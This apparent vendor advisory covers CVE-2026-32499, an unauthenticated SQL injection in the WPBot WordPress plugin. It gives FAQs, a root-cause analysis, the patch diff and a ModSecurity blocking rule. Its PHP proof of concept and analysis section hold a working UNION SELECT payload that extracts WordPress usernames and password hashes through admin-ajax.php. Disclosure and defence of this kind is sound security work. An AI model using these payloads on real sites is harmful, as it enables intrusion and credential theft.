What is CVE-2026-32499?

CVE-2026-32499 is a high-severity SQL injection vulnerability found in the WPBot – AI ChatBot for Live Support, Lead Generation, AI Services plugin for WordPress, affecting versions up to and including 7.7.9. This vulnerability allows unauthenticated attackers to execute arbitrary SQL queries against the WordPress database.

How does the SQL injection vulnerability work?

The vulnerability arises from insufficient escaping of user-supplied parameters in the wpbo_search_site_pagination() function. Attackers can manipulate the input parameters to append malicious SQL queries, potentially extracting sensitive data from the database.

Who is affected by this vulnerability?

Any WordPress site using the WPBot plugin version 7.7.9 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard under ‘Plugins’ to determine if they are affected.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the installed version of the WPBot plugin. If it is version 7.7.9 or earlier, your site is susceptible to this SQL injection vulnerability.

How can I fix CVE-2026-32499?

To fix the vulnerability, update the WPBot plugin to version 7.8.0 or later, which includes security patches. Regularly updating plugins is crucial for maintaining site security.

What are the practical risks associated with this vulnerability?

The risk level is classified as high, with a CVSS score of 7.5. Successful exploitation can lead to complete database compromise, allowing attackers to extract sensitive information such as user credentials and personal data.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to affected systems. This score reflects the potential impact and exploitability of the vulnerability.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a specially crafted POST request to the WordPress AJAX endpoint. This request includes malicious SQL payloads that can extract sensitive data from the database.

What steps should I take after updating the plugin?

After updating the plugin, monitor your site for any unusual activity and consider conducting a security audit. It is also advisable to review user accounts and database integrity to ensure no unauthorized access occurred.

Are there any additional security measures I should implement?

In addition to updating the plugin, consider implementing security best practices such as using a web application firewall, regularly backing up your site, and conducting periodic security scans.

What should I do if my site has already been compromised?

If you suspect your site has been compromised, take immediate action to secure it. This includes updating all plugins and themes, changing passwords, and restoring from a clean backup if necessary. Additionally, investigate the breach to understand the extent of the compromise.

Where can I find more information about this vulnerability?

More information can be found on the official CVE database, security advisories from WordPress, and the plugin’s changelog. Keeping abreast of security updates and advisories is essential for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 30, 2026

CVE-2026-32499: WPBot – AI ChatBot for Live Support, Lead Generation, AI Services <= 7.7.9 – Unauthenticated SQL Injection (chatbot)

CVE ID CVE-2026-32499

Plugin chatbot

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 7.7.9

Patched Version 7.8.0

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-32499:
The WPBot plugin for WordPress contains an unauthenticated SQL injection vulnerability in the wpbo_search_site_pagination() function. This vulnerability affects versions up to and including 7.7.9, allowing attackers to execute arbitrary SQL queries against the WordPress database without authentication. The CVSS score of 7.5 reflects the high impact of successful exploitation.

Atomic Edge research identified the root cause in the wpbo_search_site_pagination() function within chatbot/qcld-wpwbot-search.php. The function directly concatenated user-controlled parameters into SQL queries without proper escaping or prepared statements. Specifically, the $post_type and $searchkeyword variables (lines 332-347) were directly interpolated into SQL strings. The $post_type parameter passed through sanitize_text_field() but lacked proper validation against allowed values, while $searchkeyword originated from user-supplied $_POST[‘keyword’] after minimal processing.

The exploitation method targets the WordPress AJAX endpoint /wp-admin/admin-ajax.php with the action parameter set to wpbo_search_site_pagination. Attackers can send POST requests containing malicious SQL payloads in the type parameter (for $post_type) or keyword parameter (for $searchkeyword). For example, setting type to ‘post’) UNION SELECT user_login,user_pass FROM wp_users–‘ would extract user credentials. The absence of nonce verification in vulnerable versions allows unauthenticated exploitation.

The patch introduces multiple security layers. It adds nonce verification using wp_verify_nonce() with ‘wpbot_search_nonce’ (lines 323-326). The code replaces direct string concatenation with prepared statements using $wpdb->prepare() (lines 365-388). Input validation restricts $post_type to allowed values (‘post’, ‘page’, ‘product’) using in_array() (lines 336-339). The patch converts $page to integer via absint() and validates $orderby against a whitelist. These changes eliminate SQL injection by separating data from query structure.

Successful exploitation enables complete database compromise. Attackers can extract sensitive information including user credentials, personal data, plugin configurations, and WooCommerce customer records. The vulnerability allows data exfiltration, potential privilege escalation through admin credential theft, and complete database manipulation. Atomic Edge analysis confirms this represents a critical information disclosure risk for affected WordPress installations.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/chatbot/qcld-wpwbot-search.php
+++ b/chatbot/qcld-wpwbot-search.php
@@ -320,9 +320,23 @@
 function wpbo_search_site_pagination() {
 	global $wpdb;

-	$keyword           = sanitize_text_field( $_POST['keyword'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
-	$post_type         = sanitize_text_field( $_POST['type'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
-	$page              = sanitize_text_field( $_POST['page'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
+	// Verify nonce for security
+	if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( $_POST['nonce'], 'wpbot_search_nonce' ) ) {
+		wp_send_json_error( array( 'message' => 'Security check failed' ) );
+		wp_die();
+	}
+
+	// Sanitize and validate inputs
+	$keyword           = isset( $_POST['keyword'] ) ? sanitize_text_field( $_POST['keyword'] ) : '';
+	$post_type         = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : 'post';
+	$page              = isset( $_POST['page'] ) ? absint( $_POST['page'] ) : 0;
+
+	// Validate post type against allowed types
+	$allowed_post_types = array( 'post', 'page', 'product' );
+	if ( ! in_array( $post_type, $allowed_post_types, true ) ) {
+		$post_type = 'post';
+	}
+
 	$enable_post_types = get_option( 'wppt_post_types' );
 	$load_more         = maybe_unserialize( get_option( 'qlcd_wp_chatbot_load_more' ) );

@@ -332,14 +346,17 @@
 	if ( is_array( $load_more ) ) {
 		$load_more = $load_more[ array_rand( $load_more ) ];
 	}
-	$searchlimit = ( get_option( 'wppt_number_of_result' ) == '' ? '5' : get_option( 'wppt_number_of_result' ) );
+	$searchlimit = ( get_option( 'wppt_number_of_result' ) == '' ? 5 : absint( get_option( 'wppt_number_of_result' ) ) );
 	$orderby     = ( get_option( 'wppt_result_orderby' ) == '' ? 'none' : get_option( 'wppt_result_orderby' ) );
 	$order       = ( get_option( 'wppt_result_order' ) == '' ? 'ASC' : get_option( 'wppt_result_order' ) );
 	$thumb       = ( get_option( 'wpbot_search_image_size' ) ? get_option( 'wpbot_search_image_size' ) : 'thumbnail' );
 	// order by setup
 	$new_window = get_option( 'wpbot_search_result_new_window' );

-	$total_items = get_option( 'wppt_number_of_result' );
+	$total_items = absint( get_option( 'wppt_number_of_result' ) );
+	if ( $total_items < 1 ) {
+		$total_items = 5;
+	}

 	$searchkeyword = qcld_wpbot_modified_keyword( $keyword );

@@ -347,19 +364,42 @@
 	$response['status'] = 'fail';
 	$response['html']   = '';

-	// $sql = "SELECT * FROM ". $wpdb->prefix."posts where post_type in ('".$post_type."') and post_status='publish' and ((post_title REGEXP '\b".$searchkeyword."\b'))";
+	// Use prepared statements to prevent SQL injection
 	if ( get_option( 'active_advance_query' ) != '1' ) {
-		$sql   = 'SELECT * FROM ' . $wpdb->prefix . "posts where post_type in ('" . $post_type . "') and post_status='publish' and ((post_title LIKE '%" . $searchkeyword . "%')) order by ID DESC";
-		$limit = ' Limit 0, ' . $searchlimit;
+		// Simple query - search in post_title only
+		$sql = $wpdb->prepare(
+			"SELECT * FROM {$wpdb->prefix}posts
+			WHERE post_type = %s
+			AND post_status = 'publish'
+			AND post_title LIKE %s
+			ORDER BY ID DESC",
+			$post_type,
+			'%' . $wpdb->esc_like( $searchkeyword ) . '%'
+		);
 	} else {
-		// advance query building
-		$sql   = 'SELECT * FROM ' . $wpdb->prefix . "posts where post_type in ('" . $post_type . "') and post_status='publish' and ((post_title REGEXP '\b" . $searchkeyword . "\b') or (post_content REGEXP '\b" . $searchkeyword . "\b')) order by ID DESC";
-		$limit = ' Limit 0, ' . $searchlimit;
+		// Advanced query - search in both post_title and post_content
+		$sql = $wpdb->prepare(
+			"SELECT * FROM {$wpdb->prefix}posts
+			WHERE post_type = %s
+			AND post_status = 'publish'
+			AND (post_title REGEXP %s OR post_content REGEXP %s)
+			ORDER BY ID DESC",
+			$post_type,
+			'[[:<:]]' . $searchkeyword . '[[:>:]]',
+			'[[:<:]]' . $searchkeyword . '[[:>:]]'
+		);
 	}
+
 	$total_results = $wpdb->get_results( $sql );

 	if ( ! empty( $total_results ) ) {

+		// Validate and sanitize orderby parameter
+		$valid_orderby = array( 'title', 'date', 'modified', 'none', 'rand' );
+		if ( ! in_array( $orderby, $valid_orderby, true ) ) {
+			$orderby = 'none';
+		}
+
 		if ( $orderby == 'title' ) {
 			$orderby = 'post_title';
 		}
@@ -370,20 +410,86 @@
 			$orderby = 'post_modified';
 		}

-		if ( $orderby != 'none' or $orderby != 'rand' ) {
-			$sql .= " order by $orderby $order";
+		// Validate order parameter
+		$order = strtoupper( $order );
+		if ( ! in_array( $order, array( 'ASC', 'DESC' ), true ) ) {
+			$order = 'ASC';
+		}
+
+		// Build query with pagination
+		$offset = absint( $total_items * $page );
+
+		if ( get_option( 'active_advance_query' ) != '1' ) {
+			if ( $orderby != 'none' && $orderby != 'rand' ) {
+				$sql = $wpdb->prepare(
+					"SELECT * FROM {$wpdb->prefix}posts
+					WHERE post_type = %s
+					AND post_status = 'publish'
+					AND post_title LIKE %s
+					ORDER BY {$orderby} {$order}
+					LIMIT %d, %d",
+					$post_type,
+					'%' . $wpdb->esc_like( $searchkeyword ) . '%',
+					$offset,
+					$total_items
+				);
+			} else {
+				$sql = $wpdb->prepare(
+					"SELECT * FROM {$wpdb->prefix}posts
+					WHERE post_type = %s
+					AND post_status = 'publish'
+					AND post_title LIKE %s
+					ORDER BY ID DESC
+					LIMIT %d, %d",
+					$post_type,
+					'%' . $wpdb->esc_like( $searchkeyword ) . '%',
+					$offset,
+					$total_items
+				);
+			}
+		} else {
+			if ( $orderby != 'none' && $orderby != 'rand' ) {
+				$sql = $wpdb->prepare(
+					"SELECT * FROM {$wpdb->prefix}posts
+					WHERE post_type = %s
+					AND post_status = 'publish'
+					AND (post_title REGEXP %s OR post_content REGEXP %s)
+					ORDER BY {$orderby} {$order}
+					LIMIT %d, %d",
+					$post_type,
+					'[[:<:]]' . $searchkeyword . '[[:>:]]',
+					'[[:<:]]' . $searchkeyword . '[[:>:]]',
+					$offset,
+					$total_items
+				);
+			} else {
+				$sql = $wpdb->prepare(
+					"SELECT * FROM {$wpdb->prefix}posts
+					WHERE post_type = %s
+					AND post_status = 'publish'
+					AND (post_title REGEXP %s OR post_content REGEXP %s)
+					ORDER BY ID DESC
+					LIMIT %d, %d",
+					$post_type,
+					'[[:<:]]' . $searchkeyword . '[[:>:]]',
+					'[[:<:]]' . $searchkeyword . '[[:>:]]',
+					$offset,
+					$total_items
+				);
+			}
 		}
-		$limit = ' Limit ' . ( $total_items * $page ) . ", $total_items";

-		$results = $wpdb->get_results( $sql . $limit );
+		$results = $wpdb->get_results( $sql );
 	} else {
 		if ( class_exists( 'SitePress' ) ) {
 			global $sitepress;
-			$selected_lan = sanitize_text_field( $_POST['language'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
+			$selected_lan = isset( $_POST['language'] ) ? sanitize_text_field( $_POST['language'] ) : '';
 			$selected_lan = explode( '_', $selected_lan );
-			$sitepress->switch_lang( $selected_lan[0], true );
-
+			if ( ! empty( $selected_lan[0] ) ) {
+				$sitepress->switch_lang( $selected_lan[0], true );
+			}
 		}
+
 		$query_arg = array(
 			'post_type'      => $post_type,
 			'post_status'    => 'publish',
@@ -392,16 +498,18 @@
 			'paged'          => ( $page + 1 ),
 			'orderby'        => $orderby,
 		);
+
 		if ( class_exists( 'SitePress' ) ) {
 			global $sitepress;
-			$selected_lan = sanitize_text_field( $_POST['language'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
+			$selected_lan = isset( $_POST['language'] ) ? sanitize_text_field( $_POST['language'] ) : '';
 			$selected_lan = explode( '_', $selected_lan );
-			$sitepress->switch_lang( $selected_lan[0], true );
-
+			if ( ! empty( $selected_lan[0] ) ) {
+				$sitepress->switch_lang( $selected_lan[0], true );
+			}
 		}

 		$query_arg['suppress_filters'] = true;
-		if ( $orderby != 'none' or $orderby != 'rand' ) {
+		if ( $orderby != 'none' && $orderby != 'rand' ) {
 			$query_arg['order'] = $order;
 		}

@@ -410,7 +518,6 @@
 				'post_type'   => $post_type,
 				'post_status' => 'publish',
 				's'           => stripslashes( $keyword ),
-
 			)
 		);
 		$resultss      = new WP_Query( $query_arg );
@@ -419,88 +526,86 @@
 		$results       = $resultss->posts;
 	}

-
-
-
-
 	if ( ! empty( $total_results ) ) {

-		$selected_lan     = sanitize_text_field( $_POST['language'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
+		$selected_lan     = isset( $_POST['language'] ) ? sanitize_text_field( $_POST['language'] ) : '';
 		$urlss            = get_option( 'wpbotml_url_urls' ) ? get_option( 'wpbotml_url_urls' ) : '';
 		$imagesize        = ( get_option( 'wpbot_search_image_size' ) != '' ? get_option( 'wpbot_search_image_size' ) : 'thumbnail' );

-
 		$response['html'] .= '<div class="wpb-search-result">';

-				foreach ( $total_results as $result ) {
+		foreach ( $total_results as $result ) {

-					if ( $result->post_type == 'product' ) {
-						if ( ! class_exists( 'WooCommerce' ) ) {
-							continue;
-						}
-					}
+			if ( $result->post_type == 'product' ) {
+				if ( ! class_exists( 'WooCommerce' ) ) {
+					continue;
+				}
+			}

-					$featured_img_url = get_the_post_thumbnail_url( $result->ID, $thumb );
-					$excerpt = '';
-					if ( isset( $result->ID ) ) {
-						$post_obj = get_post( $result->ID );
-						if ( $post_obj ) {
-							if ( has_excerpt( $result->ID ) ) {
-								$excerpt = get_the_excerpt( $result->ID );
-							} else {
-								$content = $post_obj->post_content;
-
-								// Remove ALL WPBakery shortcodes (paired + self-closing)
-								$content = preg_replace( '/[vc_[^]]*](.*?)[/vc_[^]]*]/s', '$1', $content ); // paired
-								$content = preg_replace( '/[vc_[^]]*]/s', '', $content ); // self-closing
-								$content = preg_replace('/[/?[w-]+[^]]*]/', '', $content);
-								// Extra: remove any leftover [] shortcodes (just in case)
-								$content = strip_shortcodes( $content );
-
-								// Run through normal WP content filters
-								$content_filtered = apply_filters( 'the_content', $content );
-
-								// Strip HTML tags, then trim
-								$excerpt = wp_trim_words( wp_strip_all_tags( $content_filtered ), 20, '...' );
-							}
-						}
-					}
-
-
-					$response['html'] .= '<div class="wpbot_card_wraper">';
-					$response['html'] .= '<div class="wpbot_card_image ' . ( $result->post_type == 'product' ? 'wp-chatbot-product' : '' ) . ' ' . ( $featured_img_url == '' ? 'wpbot_card_image_saas' : '' ) . '"><a href="' . esc_url( get_permalink( $result->ID ) ) . '" ' . ( $new_window == 1 ? 'target="_blank"' : '' ) . ' ' . ( $result->post_type == 'product' ? 'wp-chatbot-pid="' . $result->ID . '"' : '' ) . '>';
-					if ( $featured_img_url != '' ) {
-						$response['html'] .= '<img src="' . esc_url_raw( $featured_img_url ) . '" />';
-					}
+			$featured_img_url = get_the_post_thumbnail_url( $result->ID, $thumb );
+			$excerpt = '';
+			if ( isset( $result->ID ) ) {
+				$post_obj = get_post( $result->ID );
+				if ( $post_obj ) {
+					if ( has_excerpt( $result->ID ) ) {
+						$excerpt = get_the_excerpt( $result->ID );
+					} else {
+						$content = $post_obj->post_content;
+
+						// Remove ALL WPBakery shortcodes (paired + self-closing)
+						$content = preg_replace( '/[vc_[^]]*](.*?)[/vc_[^]]*]/s', '$1', $content ); // paired
+						$content = preg_replace( '/[vc_[^]]*]/s', '', $content ); // self-closing
+						$content = preg_replace('/[/?[w-]+[^]]*]/', '', $content);
+						// Extra: remove any leftover [] shortcodes (just in case)
+						$content = strip_shortcodes( $content );

-					$response['html'] .= '<div class="wpbot_card_caption ' . ( $featured_img_url == '' ? 'wpbot_card_caption_saas' : '' ) . '">';
-					$response['html'] .= '<p class="wpbot_card_caption_title"><span style="padding: 0 5px;color: #1d73b4;display: inline-block;margin: 0 5px 0 0;width: 18px;height: 18px;border-radius: 50%;font-size: 20px;line-height: 22px;"> ✓ </span> ' . esc_html( $result->post_title ) . '</p>';
-					$response['html'] .= '<p class="wpbot_card_description">' . esc_html( $excerpt ) . '</p>';
-					if ( $result->post_type == 'product' ) {
-						if ( class_exists( 'WooCommerce' ) ) {
-							$product           = wc_get_product( $result->ID );
-							$response['html'] .= '<p class="wpbot_product_price">' . get_woocommerce_currency_symbol() . $product->get_price_html() . '</p>';
-						}
+						// Run through normal WP content filters
+						$content_filtered = apply_filters( 'the_content', $content );
+
+						// Strip HTML tags, then trim
+						$excerpt = wp_trim_words( wp_strip_all_tags( $content_filtered ), 20, '...' );
 					}
-					$response['html'] .= '</div>';
-					$response['html'] .= '</a></div>';
-					$response['html'] .= '</div>';
-
 				}
-
+			}
+
+
+			$response['html'] .= '<div class="wpbot_card_wraper">';
+			$response['html'] .= '<div class="wpbot_card_image ' . ( $result->post_type == 'product' ? 'wp-chatbot-product' : '' ) . ' ' . ( $featured_img_url == '' ? 'wpbot_card_image_saas' : '' ) . '"><a href="' . esc_url( get_permalink( $result->ID ) ) . '" ' . ( $new_window == 1 ? 'target="_blank"' : '' ) . ' ' . ( $result->post_type == 'product' ? 'wp-chatbot-pid="' . absint( $result->ID ) . '"' : '' ) . '>';
+			if ( $featured_img_url != '' ) {
+				$response['html'] .= '<img src="' . esc_url_raw( $featured_img_url ) . '" />';
+			}
+
+			$response['html'] .= '<div class="wpbot_card_caption ' . ( $featured_img_url == '' ? 'wpbot_card_caption_saas' : '' ) . '">';
+			$response['html'] .= '<p class="wpbot_card_caption_title"><span style="padding: 0 5px;color: #1d73b4;display: inline-block;margin: 0 5px 0 0;width: 18px;height: 18px;border-radius: 50%;font-size: 20px;line-height: 22px;"> ✓ </span> ' . esc_html( $result->post_title ) . '</p>';
+			$response['html'] .= '<p class="wpbot_card_description">' . esc_html( $excerpt ) . '</p>';
+			if ( $result->post_type == 'product' ) {
+				if ( class_exists( 'WooCommerce' ) ) {
+					$product           = wc_get_product( $result->ID );
+					$response['html'] .= '<p class="wpbot_product_price">' . get_woocommerce_currency_symbol() . $product->get_price_html() . '</p>';
+				}
+			}
+			$response['html'] .= '</div>';
+			$response['html'] .= '</a></div>';
+			$response['html'] .= '</div>';
+
+		}
+

 		$response['html']  .= '</div>';
 		$response['status'] = 'success';

 	}
-		wp_reset_query();
+	wp_reset_query();

 	if ( $response['status'] != 'success' ) {
 		$texts            = maybe_unserialize( get_option( 'qlcd_wp_chatbot_no_result' ) );
-		$selected_lan     = sanitize_text_field( $_POST['language'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
-		$texts            = str_replace( "'", "'", $texts[ $selected_lan ][0] );
-		$response['html'] = array( $texts );
-
+		$selected_lan     = isset( $_POST['language'] ) ? sanitize_text_field( $_POST['language'] ) : '';
+		if ( ! empty( $texts ) && is_array( $texts ) && isset( $texts[ $selected_lan ][0] ) ) {
+			$texts            = str_replace( "'", "'", $texts[ $selected_lan ][0] );
+			$response['html'] = array( $texts );
+		} else {
+			$response['html'] = array( 'No results found' );
+		}
 	}
 	wp_send_json( $response );
 	die();
--- a/chatbot/qcld-wpwbot.php
+++ b/chatbot/qcld-wpwbot.php
@@ -4,7 +4,7 @@
  * Plugin URI: https://wordpress.org/plugins/chatbot/
  * Description: ChatBot is a native WordPress ChatBot plugin to provide live chat support and lead generation
  * Donate link: https://www.wpbot.pro/
- * Version: 7.7.9
+ * Version: 7.8.0
  * @author    QuantumCloud
  * Author: ChatBot for WordPress - WPBot
  * Author URI: https://www.wpbot.pro/
@@ -41,7 +41,7 @@
 }

 if ( ! defined( 'QCLD_wpCHATBOT_VERSION' ) ) {
-    define('QCLD_wpCHATBOT_VERSION', '7.7.9');
+    define('QCLD_wpCHATBOT_VERSION', '7.8.0');
 }
 if ( ! defined( 'QCLD_wpCHATBOT_REQUIRED_wpCOMMERCE_VERSION' ) ) {
     define('QCLD_wpCHATBOT_REQUIRED_wpCOMMERCE_VERSION', 2.2);

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-32499
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10032499,phase:2,deny,status:403,chain,msg:'CVE-2026-32499 - WPBot SQL Injection via AJAX',severity:'CRITICAL',tag:'CVE-2026-32499',tag:'WordPress',tag:'WPBot',tag:'SQLi'"
  SecRule ARGS_POST:action "@streq wpbo_search_site_pagination" "chain"
    SecRule ARGS_POST:type "@rx (?i)(?:union[s(]+select|select[s(]+.*from|insert[s(]+into|update[s(]+.*set|delete[s(]+from|drop[s(]+table|create[s(]+table|exec(?:ute)?[s(]+|load_file[s(]*(|into[s(]+(?:out|dump)file|benchmark[s(]*(|sleep[s(]*(|waitfor[s(]+delay|pg_sleep[s(]*(|b(?:or|xor)b[s(]*.*[=<>]+|--|#|/*|*/|[;'])" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-32499 - WPBot – AI ChatBot for Live Support, Lead Generation, AI Services <= 7.7.9 - Unauthenticated SQL Injection

<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';

// Exploit parameters
$action = 'wpbo_search_site_pagination';

// SQL injection payload to extract admin credentials
// Uses UNION injection with column count matching the original query
$malicious_type = "post') UNION SELECT NULL,user_login,user_pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM wp_users WHERE 1=1--";

$post_data = [
    'action' => $action,
    'type' => $malicious_type,  // Injected into post_type parameter
    'keyword' => 'test',        // Normal search term
    'page' => '0'               // Pagination parameter
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code == 200) {
    echo "[+] Exploit sent successfullyn";
    echo "[+] Response length: " . strlen($response) . " bytesn";
    
    // Parse JSON response
    $json_response = json_decode($response, true);
    
    if ($json_response && isset($json_response['html'])) {
        echo "[+] Response contains HTML datan";
        // The injected SQL results may appear in the HTML output
        // Look for username/password patterns in the response
        if (preg_match('/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]{2,}/', $json_response['html'], $matches)) {
            echo "[+] Possible email addresses found in responsen";
        }
        
        // Save response for manual inspection
        file_put_contents('cve-2026-32499-response.html', $json_response['html']);
        echo "[+] Response saved to cve-2026-32499-response.htmln";
    } else {
        echo "[-] Invalid JSON response or missing HTML fieldn";
        echo "Raw response: " . substr($response, 0, 500) . "...n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-32499?
Overview of the vulnerability
CVE-2026-32499 is a high-severity SQL injection vulnerability found in the WPBot – AI ChatBot for Live Support, Lead Generation, AI Services plugin for WordPress, affecting versions up to and including 7.7.9. This vulnerability allows unauthenticated attackers to execute arbitrary SQL queries against the WordPress database.
How does the SQL injection vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient escaping of user-supplied parameters in the wpbo_search_site_pagination() function. Attackers can manipulate the input parameters to append malicious SQL queries, potentially extracting sensitive data from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WPBot plugin version 7.7.9 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard under ‘Plugins’ to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the installed version of the WPBot plugin. If it is version 7.7.9 or earlier, your site is susceptible to this SQL injection vulnerability.
How can I fix CVE-2026-32499?
Mitigation steps
To fix the vulnerability, update the WPBot plugin to version 7.8.0 or later, which includes security patches. Regularly updating plugins is crucial for maintaining site security.
What are the practical risks associated with this vulnerability?
Understanding the impact
The risk level is classified as high, with a CVSS score of 7.5. Successful exploitation can lead to complete database compromise, allowing attackers to extract sensitive information such as user credentials and personal data.
What does the CVSS score of 7.5 indicate?
Interpreting the severity
A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to affected systems. This score reflects the potential impact and exploitability of the vulnerability.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a specially crafted POST request to the WordPress AJAX endpoint. This request includes malicious SQL payloads that can extract sensitive data from the database.
What steps should I take after updating the plugin?
Post-update actions
After updating the plugin, monitor your site for any unusual activity and consider conducting a security audit. It is also advisable to review user accounts and database integrity to ensure no unauthorized access occurred.
Are there any additional security measures I should implement?
Enhancing overall security
In addition to updating the plugin, consider implementing security best practices such as using a web application firewall, regularly backing up your site, and conducting periodic security scans.
What should I do if my site has already been compromised?
Response to a security breach
If you suspect your site has been compromised, take immediate action to secure it. This includes updating all plugins and themes, changing passwords, and restoring from a clean backup if necessary. Additionally, investigate the breach to understand the extent of the compromise.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found on the official CVE database, security advisories from WordPress, and the plugin’s changelog. Keeping abreast of security updates and advisories is essential for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations